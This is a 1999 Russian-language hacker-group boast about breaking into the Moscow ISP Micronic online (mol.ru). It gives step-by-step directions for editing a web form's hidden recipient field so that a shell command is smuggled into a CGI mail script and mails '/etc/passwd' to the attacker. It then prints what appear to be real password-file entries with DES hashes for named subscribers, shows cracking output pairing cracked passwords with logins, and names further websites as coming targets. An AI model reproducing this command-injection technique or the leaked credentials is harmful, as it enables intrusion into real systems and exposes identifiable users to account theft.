Российская cyberкорпорация "CHC" ЗАО ( Chaos Hackers Crew ) при участии и содействии хорошего человека, пожелавшего остаться неизвестным, являющегося главным консалтинговым агентом в проведении операций, проделала лабораторную работу по изучению доступа в сеть Internet через одного из самых "тормозных" провайдеров (ISP) г. Москвы - "Micronic online". Как заявили представители CHC - данная операция не носила криминальный характер, и случайно выпавшие в ICQ, каналы IRC - раскодированные пароли, были предоставл. для тестирования реального состояния линий mol.ru - случайным пользователям... (безобидным бетта - тестерам)
Итак:
www.mol.ru - хеад оф Микроник
комментарии CHC:
"есть там html с таким заголовком <FORM Method="POST" Action="/cgi-bin/abonentmail.pl">;
сохраняем эту страничку.. меняем оную строчку на   <FORM Method="POST" Action="http://www.mol.ru/cgi-bin/abonentmail.pl">;
потом, это: <INPUT TYPE="hidden" NAME="recipient" VALUE="webmaster@mol.ru">
на: <INPUT TYPE="hidden" NAME="recipient" VALUE="some@email.com; /bin/mail u'r@email.com < /etc/passwd">;
и кнопочку жм╦м на страничке новой :-).. ОЙ , а что это за чудо - passwd пришло к нам на мыло??? ;):

root:3wu1SismwjBII:0:0:system admin:/home/root:/bin/bash
sync::5:0:flush buffers:/:/bin/sync
majordom:x:18:1:Majordomo mail list server:/:/bin/true
dick:dlRan1BejpF12:1141:106:dick:/home/dialins/dick:/bin/bash
denz:dG7mCK/7Ax1K.:674:103:denz:/home/dialins/denz:/bin/bash
arika:m/VToLemRukgY:1166:106:arika:/home/dialins/arika:/bin/bash
filantrop:Fsig4DnrfyFh2:164:103:filantrop:/home/dialins/filantrop:/bin/bash
user3:sdry9Rna1e2q.:804:103:user3:/home/dialins/user3:/bin/bash
mosel:3u66Vrm1AiQMY:984:106:mosel:/home/dialins/mosel:/bin/bash
los:GkMuvorRm9n4c:1224:106:los:/home/dialins/los:/bin/bash
pol:AKO3ULRQYTBIs:233:103:pol:/home/dialins/pol:/bin/bash
gilnor:LfMJwokq9DPWI:1230:106:gilnor:/home/dialins/gilnor:/bin/bash
sakhisha:RnjRWQqQ2DVkQ:1188:103:sakhisha:/home/dialins/sakhisha:/bin/bash
vespla:tUeJVAokom0Lk:784:106:vespla:/home/dialins/vespla:/bin/bash
soln:.5A40.sJ3TY2w:274:103:soln:/home/dialins/soln:/bin/bash
nivatek:WqvIQzalJD4/6:569:106:nivatek:/home/dialins/nivatek:/bin/bash
alexey_f:ujY3bWVW5mBDw:838:103:alexey_f:/home/dialins/alexey_f:/bin/bash
nikiforov:08JzPKOUNd8B.:328:103:nikiforov:/home/dialins/nikiforov:/bin/bash
caesar:MyX7XcIKlabMw:543:103:caesar:/home/dialins/caesar:/bin/bash
lekom:x5F99MYkvN0/Y:1246:106:lekom:/home/dialins/lekom:/bin/bash
timur81:VnV12BJAHFQG2:879:106:timur81:/home/dialins/timur81:/bin/bash
gershun:r9z0beCiW7Ohw:302:103:gershun:/home/dialins/gershun:/bin/bash
crazy:zm6fgW9mGi9v6:369:103:crazy:/home/dialins/crazy:/bin/bash
uamaxim:Qb0RJ.KJEPfuY:1252:106:uamaxim:/home/dialins/uamaxim:/bin/bash
groots:14N6DS4o32NNU:853:103:groots:/home/dialins/groots:/bin/bash

login:unixpass:u:g:user:/home/dialins.....

ну и т.д. и т.п. , вообщем, много их.. , наверное все пользователи mol.ru..
запускаем одну "админскую" прогу, от самого уважаемого админа:

?:\winnt\system32\cmd33betta.exe -wordfile:solar.lst passwd
<censored> Version 1.6 Copyright (c) 1996-98 by Solar Designer
Loaded 362 passwords with 345 different salts (Standard DES [32/32 BS])
mag1998 (mag)
eternity (yaxel)
apollo13 (gershun)
ну и т.д. и т.п., вообщем, и цифровых паролей много [(6ти значных).. в скобках - логин]

Непонятно качество предост. услуг by mol.ru... Сплошные time out и тормоза... (модемные линии в порядке по качеству, но вот дозвониться туда вечером может только гэрой ;) Не стыдно? Куда только смотрит Общество защиты прав потребителей?.. Уважаемые ISPs - берите пример с Роснет, Демос, МТУ, Инфотел, ЦНТ, Постман (АХА) !
-------------------------------------------------------------------------------------------------
Coming s00n: www.kprf.ru and www.rne.org (c) Joker .-) (may be шутка т.е..)
Мы сильно не любим красно-коричневых ;-)

(x) 1999 CHCrew corporation "

Вот и вс╦, спасибо.